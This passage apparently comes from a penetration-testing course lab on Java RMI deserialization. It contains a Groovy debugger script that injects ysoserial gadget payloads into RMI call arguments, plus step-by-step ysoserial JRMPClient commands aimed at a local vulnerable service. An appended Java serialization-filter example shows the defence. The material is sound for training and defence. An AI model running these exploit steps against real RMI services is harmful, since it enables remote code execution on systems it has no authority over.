provides a Groovy wrapper for JDI so that it can be easily scripted. What we need to achieve is to set the parameters that are passed to the RMI call before they get serialized by the client. mogwailabs.de were generous enough to provide the community with such a script and a
© 2020 Caendra Inc. | WAPTXv2
    println "[+] java.rmi.server.RemoteObjectInvocationHandler.invokeRemoteMethod() is called"
    // make sure that the payload class is loaded by the classloader of the debuggee
    vm.loadClass("ysoserial.payloads." + payloadName);
    // get the Array of Objects that were passed as Arguments
    delegate."@2".eachWithIndex { arg, idx ->
        println "[+] Argument " + idx + ": " + arg[0].toString();
        if (arg[0].toString().contains(needle)) {
            println "[+] Needle " + needle + " found, replacing String with payload"
            // Create a new instance of the ysoserial payload in the debuggee
            def payload = vm._new("ysoserial.payloads." + payloadName);
            def payloadObject = payload.getObject(payloadCommand)
            vm.ref("java.lang.reflect.Array").set(delegate."@2", idx, payloadObject);
            println "[+] Done.."
        }
    }
}   // closes the youdebug breakpoint handler whose opening line precedes this excerpt
To try this attack on the provided Virtual Machine, perform the below.
▪ Execute sudo update-alternatives --config java and choose /opt/jdk/jdk1.8.0_151/bin/java
▪ Start the vulnerable RMI Service
  o cd /home/developer/Downloads/vulnerable/rmi-deserialization/BSidesMucRmiService/target
  o java -jar BSidesRMIService-0.1-jar-with-dependencies.jar
▪ Start the client in a new terminal (simulating the attacker at this point)
  o cd /home/developer/Downloads/vulnerable/rmi-deserialization/BSidesMucRmiService/target
  o java -agentlib:jdwp=transport=dt_socket,server=y,address=127.0.0.1:8000 -cp "./libs/*" de.mogwailabs.BSidesRMIService.BSidesClient 127.0.0.1
▪ Start the proxy in a new terminal
  o cd /home/developer/Downloads/
  o java -jar youdebug-1.5.jar -socket 127.0.0.1:8000 barmitzwa.groovy
A file named “pwn3d_by_barmitzwa” should now exist inside the /tmp directory!
----------
So far, we have seen remote code execution being achieved through class loading. When it comes to RMI services where a valid gadget is available in the classpath, remote code execution can also be achieved, in older versions of Java, by attacking the Distributed Garbage Collection (DGC) endpoint, which deserializes untrusted data.
To try this attack on the provided Virtual Machine, perform the below.
▪ Execute sudo update-alternatives --config java and choose /opt/jdk/jdk1.7.0_80/bin/java
▪ Terminate and restart the vulnerable RMI Service
  o cd /home/developer/Downloads/vulnerable/rmi-deserialization/BSidesMucRmiService/target
  o java -jar BSidesRMIService-0.1-jar-with-dependencies.jar
▪ Start the attacking client (an older version of CommonsCollections is bundled with the vulnerable service)
  o cd /home/developer/Downloads/
  o java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPClient 127.0.0.1 1099 CommonsCollections1 "touch /tmp/xxx"
A file named “xxx” should now exist inside the /tmp directory!
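As a defensive counterpart to both procedures above (the argument-tampering client and the DGC attack), here is an added example that is neither part of the course material nor mogwailabs' code: a JEP 290 serialization filter of the kind the RMI service could install so that a CommonsCollections gadget chain is rejected at its first class descriptor, before any of its classes are resolved. It assumes Java 9+ (java.io.ObjectInputFilter); the de.mogwailabs.BSidesRMIService package is taken from the client class on this page, while the RmiSerialFilterDemo class and its Greeting type are made up for the demo.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;

// Added example, not from the course or from mogwailabs: a JEP 290 deserialization
// filter (java.io.ObjectInputFilter, Java 9+) of the kind an RMI service installs so a
// gadget chain is rejected when its class descriptor is read, before readObject() runs.
public class RmiSerialFilterDemo {
    // Allowlist the service's own package (assumed from the client class on the page) plus
    // this demo's nested types; "!*" rejects everything else. Limits bound graph size/depth.
    static final String PATTERN =
        "maxdepth=16;maxarray=4096;de.mogwailabs.BSidesRMIService.**;RmiSerialFilterDemo$*;!*";
    // Assumed message type standing in for the service's real argument classes.
    static class Greeting implements Serializable {
        private static final long serialVersionUID = 1L;
        final String who;
        Greeting(String who) { this.who = who; }
    }
    static byte[] serialize(Object o) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }
    // Per-stream filter; the same pattern applies process-wide via -Djdk.serialFilter=...
    // and, for RMI on 8u121+/9+, via sun.rmi.registry.registryFilter / sun.rmi.transport.dgcFilter.
    static Object deserializeFiltered(byte[] data) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter(PATTERN));
            return ois.readObject();
        }
    }
    public static void main(String[] args) throws Exception {
        Greeting g = (Greeting) deserializeFiltered(serialize(new Greeting("client")));
        System.out.println("[+] allowed: " + g.who);
        // A plain HashMap stands in for an untrusted object graph; it is not on the allowlist.
        try {
            deserializeFiltered(serialize(new HashMap<String, String>()));
            System.out.println("[-] filter did not reject the map");
        } catch (InvalidClassException e) {
            System.out.println("[+] rejected: " + e.getMessage());
        }
    }
}
```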